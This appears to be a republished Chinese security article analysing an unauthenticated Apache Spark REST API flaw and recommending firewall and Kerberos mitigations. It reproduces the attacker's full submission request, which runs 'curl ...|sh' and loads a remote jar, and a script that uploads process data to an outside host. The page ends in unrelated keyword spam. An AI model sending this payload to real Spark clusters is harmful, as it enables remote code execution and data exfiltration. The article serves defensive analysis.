千家信息网

如何进行Spark REST API未授权漏洞利用分析

发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,今天就跟大家聊聊有关如何进行Spark REST API未授权漏洞利用分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。一、漏洞详情说明Apa
千家信息网最后更新 2025年12月01日如何进行Spark REST API未授权漏洞利用分析

今天就跟大家聊聊有关如何进行Spark REST API未授权漏洞利用分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

一、漏洞详情说明

Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎,是UC Berkeley AMP lab(加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架。为了让使用者能够方便的控制系统进行计算和查看任务结果,Spark也提供了 WEB UI图形化界面和相应的 REST API来方便用户操作。

Spark作为大数据时代的"计算引擎",一旦被攻破,企业的核心数据资产、计算能力、用户敏感数据都将被攻击者窃取;更进一步的,由于Spark自身的分布式特性,一个攻击点的攻破可能导致整个集群的沦陷。Spark权限设置不当,可能导致攻击者无需认证即可通过该 REST API来操作Spark创建任务、删除任务、查看任务结果等,从而最终获得执行任意指令的能力。

我们还原了攻击者的攻击步骤:

1. 攻击者通过web扫描的方式发现了一台Spark webui服务

2. 构造攻击指令,并通过6066端口发送到该服务器的REST API

POST /v1/submissions/createhost:xxxx.xxx.xx:6066{ "action": "CreateSubmissionRequest", "clientSparkVersion": "2.1.0", "appArgs": [ "curl x.x.x.x/y.sh|sh" ], "appResource": "https://xxxx.onion.plus/SimpleApp.jar", "environmentVariables": { "SPARK_ENV_LOADED": "1" }, "mainClass": "SimpleApp", "sparkProperties": { "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar", "spark.driver.supervise": "false", "spark.app.name": "SimpleApp", "spark.eventLog.enabled": "false", "spark.submit.deployMode": "cluster", "spark.master": "spark://x.x.x.x:6066" } }

该攻击payload指示服务器远程下载https://xxxxxxxx.onion.plus/SimpleApp.jar ,并执行攻击者指定的任意方法,该攻击者还通过洋葱网络来隐藏自己的相关信息。

3.对该 jar 包进行逆向分析,该 jar 包即是一个简单的执行命令的后门,

执行 jar 包时,Spark服务器将会从洋葱网络中下载一段shell脚本并执行。

4.脚本内容如下:

#!/bin/bashps ax --sort=-pcpu > /tmp/tmp.txtcurl -F "file=@/tmp/tmp.txt" http://x.x.x.x/re.phprm -rf /tmp/tmp.txt

该脚本只是简单的将性能信息打印并回传,暂未进行进一步的攻击。

二、漏洞影响与变化态势

目前全网监控,开放了8080端口暴露在公网的Spark机器共有5000台左右,黑客可批量接管其中存在权限问题的机器。

在此之前,阿里云安全团队曾针对分布式计算系统相关的漏洞进行过预警

这两个漏洞原理和利用方法非常相似,这也佐证了之前的预判。

随着加密货币经济的进一步繁荣,具有强大算力,但是较弱安全能力的分布式应用将面临更多的漏洞利用和黑客攻击。

由于Hadoop Yarn未授权漏洞在全网已经成为了黑客挖矿的一种重要手法,我们有理由相信Spark REST API漏洞也将很快被黑产利用。

三、安全专家建议

建议通过iptables或者安全组配置访问策略,限制对8088、8081、7707、6606等端口的访问;并且如无必要,不要将接口开放在公网,改为本地或者内网调用;

建议使用Spark的yarn控制模式,并且开启HTTP Kerberos对WEB UI进行访问控制;如采用Spark standalone模式,需要自行实现访问控制的jar包,并设置spark.ui.filters对WEB UI进行访问控制,

看完上述内容,你们对如何进行Spark REST API未授权漏洞利用分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。

攻击 漏洞 攻击者 控制 任务 内容 数据 服务 分析 安全 分布式 建议 服务器 端口 能力 脚本 黑客 进一 信息 全网 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 个人租服务器 航道基础数据库 网络安全要研究什么意思 ice服务器如何投票踢出人 服务器双电源设计要求 宜兴微型软件开发方法 数据库基础之sql操作数据 海南大学网络安全与信息化 串口服务器 原理 具有代表性的历史文献数据库 网络安全评测报告总结 软件开发最低价格 西城区数据网络技术一体化 软件咨询 软件开发区别 汕头微商软件开发设计 杭州赋能猫网络技术有限公司有什么岗位 服务器可以同时运行多个系统吗 雷德服务器公会排名 黄陂区方便网络安全维护管理系统 plc无法连接数据库 网络安全知识竞赛 通知 闵行区市场软件开发服务收费 网吧里的电脑怎么连接服务器 加拿大 网络安全 工作 计算机网络技术重大专业实践 外包软件开发项目管理 网络安全传输介质的安全性 无限白嫖国外云服务器 临泝巨久网络技术 地籍数据库与不动产数据库
0